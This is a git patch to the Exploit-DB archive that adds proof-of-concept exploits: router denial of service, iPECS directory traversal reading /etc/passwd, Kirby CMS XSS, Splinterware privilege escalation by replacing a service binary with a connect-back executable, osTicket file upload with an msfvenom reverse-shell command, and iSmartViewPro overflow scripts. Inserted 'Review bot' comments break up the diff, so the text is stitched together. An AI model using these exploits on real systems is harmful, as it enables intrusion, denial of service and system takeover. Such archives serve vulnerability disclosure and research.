From 9d8170fd853c6a24437796b5e896f13c6a6966bd Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 9 Aug 2018 05:01:53 +0000
Subject: [PATCH] DB: 2018-08-09
9 changes to exploits/shellcodes
TP-Link Wireless N Router WR840N - Denial of Service (PoC)
Splinterware System Scheduler Pro 5.12 - Privilege Escalation
iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
iSmartViewPro 1.5 - 'Account' Buffer Overflow
OpenEMR < 5.0.1 - Remote Code Execution
Kirby CMS 2.5.12 - Cross-Site Scripting
osTicket 1.10.1 - Arbitrary File Upload
LG-Ericsson iPECS NMS 30M - Directory Traversal
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
---
 exploits/hardware/dos/45168.txt | 22 +++++++++
 exploits/hardware/webapps/45021.txt | 1 +
 exploits/linux/webapps/45167.txt | 24 ++++++++++
 exploits/php/webapps/45068.txt | 20 +++++++++
 exploits/php/webapps/45154.html | 2 +-
 exploits/windows/local/45072.txt | 62 ++++++++++++++++++++++++++
 exploits/windows/webapps/45169.txt | 31 +++++++++++++
 exploits/windows_x86-64/local/45165.py | 29 ++++++++++++
 exploits/windows_x86-64/local/45166.py | 28 ++++++++++++
 files_exploits.csv | 15 +++++--
 10 files changed, 229 insertions(+), 5 deletions(-)
 create mode 100644 exploits/hardware/dos/45168.txt
 create mode 100644 exploits/linux/webapps/45167.txt
 create mode 100644 exploits/php/webapps/45068.txt
 create mode 100644 exploits/windows/local/45072.txt
 create mode 100644 exploits/windows/webapps/45169.txt
 create mode 100755 exploits/windows_x86-64/local/45165.py
 create mode 100755 exploits/windows_x86-64/local/45166.py
diff --git a/exploits/hardware/dos/45168.txt b/exploits/hardware/dos/45168.txt
new file mode 100644
index 000000000..6d7d9f27c
--- /dev/null
+++ b/exploits/hardware/dos/45168.txt
@@ -0,0 +1,22 @@
+# Exploit Title:- TP-Link Wireless N Router WR840N - Denial of Service (PoC)
+# Date: 2018-08-05
+# Vendor Homepage: https://www.tp-link.com/
+# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+# Version: TP-Link Wireless N Router WR840N
+# Category: Hardware
+# Exploit Author: Aniket Dinda
+# Tested on: Windows 10
+# Web: https://hackingvila.wordpress.com
+# CVE: N/A
+
+# Proof Of Concept:
+
+1- First connect to this network.
+2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
+3- Go to Quick setup.
+4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string.
+5- Now we paste a string consisting of 2000 zeros.
+6- Then forward the connection.
+7- Then your router automatically logout and net connection will be gone.
+
+You have to reboot your router before it becomes available again.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45021.txt b/exploits/hardware/webapps/45021.txt
index 59a3dc5b9..4dcbbbadf 100644
--- a/exploits/hardware/webapps/45021.txt
+++ b/exploits/hardware/webapps/45021.txt
@@ -4,6 +4,7 @@
 # Exploit Author: Safak Aslan
 # Software Link: http://www.celalink.com
 # Version: 2.7.1.6
+# CVE: 2018-15137
 # Authentication Required: No
 # Tested on: Windows
diff --git a/exploits/linux/webapps/45167.txt b/exploits/linux/webapps/45167.txt
new file mode 100644
index 000000000..3130d8233
--- /dev/null
+++ b/exploits/linux/webapps/45167.txt
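Review bot: The `# Version:` field in 45168.txt repeats the product name (`TP-Link Wireless N Router WR840N`) rather than the firmware revision that was tested, so the record cannot be scoped to affected firmware or checked against a later fix. The header should carry the firmware version, e.g. `# Version: WR840N, firmware <version tested>` (placeholder; the advisory does not state it). `# Exploit Title:-` also has a stray hyphen after the colon that the other headers in this commit do not.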
@@ -0,0 +1,24 @@
+# Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal
+# Shodon Dork: iPECS CM
+# Exploit Author: Safak Aslan
+# Software Link: www.ipecs.com
+# Version: 30M (System)
+# Authentication Required: No
+# Tested on: Linux
+# CVE: N/A
+
+# Description
+# The directory traversal was detected on LG-Ericsson's iPECS product that
+# can be exploited to reach sensitive info on the vulnerable system.
+# Ericsson-LG iPECS NMS 30M allows directory traversal via
+# ipecs-cm/download?filename=../ URIs.
+
+# The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd.
+# By the sending of the below GET request, it is possible to reach configuration files directly.
+
+targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
+
+# The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg.
+# By the sending of the below GET request, it is possible to reach configuration files directly.
+
+targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
\ No newline at end of file
diff --git a/exploits/php/webapps/45068.txt b/exploits/php/webapps/45068.txt
new file mode 100644
index 000000000..fca0fe9d8
--- /dev/null
+++ b/exploits/php/webapps/45068.txt
@@ -0,0 +1,20 @@
+# Exploit Title:​​ Kirby CMS 2.5.12 - Cross-Site Scripting
+# Date: 2018-07-22
+# Exploit Author: Zaran Shaikh
+# Version: ​2.5.12
+# CVE : ​NA
+# Category: ​Web Application
+
+# Description
+# The application allows user injected payload which can lead to Stored
+# Cross Site Scripting.
+
+# Proof of Concept
+# 1. Visit the application as low priv user
+# 2. Go to add page option
+# 3. Under title, enter any XSS payload like:
+
+
+
+# 4. Upon the payload being injected, the subsequent page is triggered
+# with XSS
\ No newline at end of file
diff --git a/exploits/php/webapps/45154.html b/exploits/php/webapps/45154.html
index 244a61a36..612df387d 100644
--- a/exploits/php/webapps/45154.html
+++ b/exploits/php/webapps/45154.html
@@ -14,7 +14,7 @@ the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning t
-
+
diff --git a/exploits/windows/local/45072.txt b/exploits/windows/local/45072.txt
new file mode 100644
index 000000000..890628bc5
--- /dev/null
+++ b/exploits/windows/local/45072.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Splinterware System Scheduler Pro 5.12 - Privilege Escalation
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Date: 2018-07-21
+# Vulnerable Software: System Scheduler Pro 5.12
+# Vendor Homepage: https://www.splinterware.com
+# Version: 5.12
+# Tested Windows 7 SP1 x86
+# CVE: N/A
+
+# Description:
+# Splinterware System Scheduler Pro 5.12 suffers from
+# Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# To successfully exploit this vulnerability, the System Scheduler service must already be installed.
+
+# Details
+# By default the Everyone group has the modify permission to System Schedule files as shown below.
+# With the service installed, a low privilege account is able to rename the WService.exe file located in
+# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service
+# through the application, the service is checked periodically triggering the execution of the malicious file.
+
+C:\>icacls "c:\Program Files (x86)\SystemScheduler"
+Everyone:(OI)(CI)(M)
+NT SERVICE\TrustedInstaller:(I)(F)
+NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+C:\>sc qc WindowsScheduler
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WindowsScheduler
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : System Scheduler Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+# Proof of Concept
+1. Login as regular user where Splinterware System Scheduler Pro 5.12 and the service are installed
+2. Create malicious .exe with same name 'wservice.exe' that can connect back to attacking machine
+3. Download malicious .exe on victim machine, and setup listener on attacking machine
+4. Rename original wservice.exe file to wservice.bak, and copy malicious file to location of original
+5. wait short amount of time and check attacking machine listener
+6. connection back from victim machine successful, run whoami
+
+nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/webapps/45169.txt b/exploits/windows/webapps/45169.txt
new file mode 100644
index 000000000..d1d65f1af
--- /dev/null
+++ b/exploits/windows/webapps/45169.txt
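Review bot: The Details section of 45072.txt shows the root cause (`Everyone:(OI)(CI)(M)` as a non-inherited ACE on the SystemScheduler directory while `SERVICE_START_NAME : LocalSystem`) but gives no remediation, so the record is less useful to anyone who has to fix or detect the issue. A mitigation line after the `sc qc` output would close that gap, e.g. `# Mitigation: remove the Modify ACE for Everyone on the install directory (the inherited ACEs already limit BUILTIN\Users to RX) and monitor the service binary path for replacement or renames.` The `# Tested Windows 7 SP1 x86` header is also missing the `on:` used by the other files' `# Tested on:` fields.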
@@ -0,0 +1,31 @@
+# Exploit Title: osTicket 1.10.1 - Arbitrary File Upload
+# Exploit Author: r3j10r (Rajwinder Singh)
+# Date: 2018-08-08
+# Vendor Homepage: http://osticket.com/
+# Software Link: http://osticket.com/download
+# Version: osTicket v1.10.1
+# CVE-2017-15580
+
+# Vulnerability Details:
+# osTicket application provides a functionality to upload 'html' files
+# with associated formats. However, application does not properly validate
+# the content of file and accepts any type of files.
+
+# Proof-of-Concept:
+# Uploaded shell to get reverse shell of end user for the demo purpose.
+
+1. Created a valid '.html' file to bypass client-side validations.
+ + test + +

test page

+
+
+2. Created a reverse shell with '.exe' file extension using msfvenom.
+msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -e -f exe -o reverse.exe
+3. Intercepted the request in BurpSuite and changed file extension '.html' to '.exe' and its content
+4. Received a valid response from server along with uploaded malicious file.
+5. Got reverse shell after execution of the uploaded payload.
+
+# Affected Component:
+Parameter: tickets.php?id=#reply
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/45165.py b/exploits/windows_x86-64/local/45165.py
new file mode 100755
index 000000000..4ea01f6d1
--- /dev/null
+++ b/exploits/windows_x86-64/local/45165.py
@@ -0,0 +1,29 @@
+# Exploit Title: iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
+# Author: Rodrigo Eduardo Rodriguez
+# Discovery Date: 2018-08-07
+# Vendor Homepage: https://securimport.com/
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the BoF:
+# 1.- Run python code : python generatepaste.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- clic button "+"
+# 5.- Select "add device manually"
+# 6.- paste ClipBoard on "Device Alias"
+# 7.- DNS/IP/DID -> "0.0.0.0"
+# 8.- acount -> "admin"
+# 9.- password -> "admin"
+# 10.- Save
+# 11.- BoF
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 415
+eip = "\x42" * 4
+f = open ("generate.txt", "w")
+f.write(buffer + eip)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/45166.py b/exploits/windows_x86-64/local/45166.py
new file mode 100755
index 000000000..571c0d24b
--- /dev/null
+++ b/exploits/windows_x86-64/local/45166.py
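Review bot: The header `+# CVE-2017-15580` in 45169.txt does not follow the `# CVE: <id>` field format used by the other headers in this commit (`# CVE: 2018-15137` in 45021.txt, `# CVE: N/A` in the new files), so anything parsing the field by key will miss it; `# CVE: 2017-15580` matches the convention. The HTML sample between step 1 and step 2 is not recoverable in this rendering, so that part of the hunk is not reviewed here.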
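Review bot: In 45165.py the `#!/usr/bin/env python` and `# -*- coding: utf-8 -*-` lines sit at lines 23-24, after the header comments, where neither takes effect: a shebang is only honoured on line 1 (so the 100755 mode buys nothing) and PEP 263 requires the coding declaration on line 1 or 2. 45166.py has the same layout, and there it matters more: its header comment `Alan Joaquín` is non-ASCII, which a Python 2 `python` interpreter rejects with a SyntaxError when no coding declaration is seen on the first two lines. Move both lines to the top of each file. The file handling would also be clearer as `with open("generate.txt", "w") as f:` followed by `    f.write(buffer + eip)`, which closes the handle even if the write raises, and the step `python generatepaste.py` in both headers does not match the file names as committed.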
@@ -0,0 +1,28 @@
+# Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow
+# Discovery by: Alan Joaquín Baeza Meza
+# Discovery Date: 2018-08-07
+# Vendor Homepage: http://www.securimport.com/n/en/
+# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Tested on OS : Windows 10 Pro x64 es
+
+# Steps to Produce the BoF:
+# 1.- Run python code : python generatepaste.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- Add device manually
+# 5.- Device alias -> A
+# 6.- Device Type-> SmartP2P
+# 7.- DDNS/IP/DID-> 0.0.0.0
+# 8.- Paste ClipBoard on "Account"
+# 9.- Password -> A
+#10.- Aceptar
+#11.- BoF
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 479
+eip= "\x42" * 4
+f = open ("generate.txt", "w")
+f.write(buffer+eip)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7417306e2..bf9056153 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6038,6 +6038,7 @@ id,file,description,date,author,type,platform,port
 45121,exploits/multiple/dos/45121.txt,"WebRTC - VP8 Block Decoding Use-After-Free",2018-08-01,"Google Security Research",dos,multiple,
 45122,exploits/multiple/dos/45122.txt,"WebRTC - FEC Processing Overflow",2018-08-01,"Google Security Research",dos,multiple,
 45123,exploits/multiple/dos/45123.txt,"WebRTC - H264 NAL Packet Processing Type Confusion",2018-08-01,"Google Security Research",dos,multiple,
+45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80
 45162,exploits/windows_x86-64/dos/45162.py,"QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)",2018-08-07,"Rodrigo Eduardo Rodriguez",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@@ -9841,6 +9842,7 @@ id,file,description,date,author,type,platform,port
 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
+45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,
 45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris,
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
@@ -9854,6 +9856,8 @@ id,file,description,date,author,type,platform,port
 45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows,
 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
 45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64,
+45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
+45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39703,7 +39707,7 @@ id,file,description,date,author,type,platform,port
 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
-45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,
+45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
@@ -39729,6 +39733,7 @@ id,file,description,date,author,type,platform,port
 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
 45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
+45068,exploits/php/webapps/45068.txt,"Kirby CMS 2.5.12 - Cross-Site Scripting",2018-07-23,"Zaran Shaikh",webapps,php,
 45160,exploits/windows/webapps/45160.txt,"Open-AudIT Community 2.2.6 - Cross-Site Scripting",2018-08-06,"Ranjeet Jaiswal",webapps,windows,
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
@@ -39745,6 +39750,8 @@ id,file,description,date,author,type,platform,port
 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
 45131,exploits/php/webapps/45131.py,"CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection",2018-08-02,0x09AL,webapps,php,
 45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
+45169,exploits/windows/webapps/45169.txt,"osTicket 1.10.1 - Arbitrary File Upload",2018-08-08,"Rajwinder Singh",webapps,windows,
+45167,exploits/linux/webapps/45167.txt,"LG-Ericsson iPECS NMS 30M - Directory Traversal",2018-08-08,"Safak Aslan",webapps,linux,80
 45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
 45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
 45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
@@ -39754,6 +39761,6 @@ id,file,description,date,author,type,platform,port
 45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
 45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80
 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,
-45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,
-45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,
-45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,
+45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
+45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80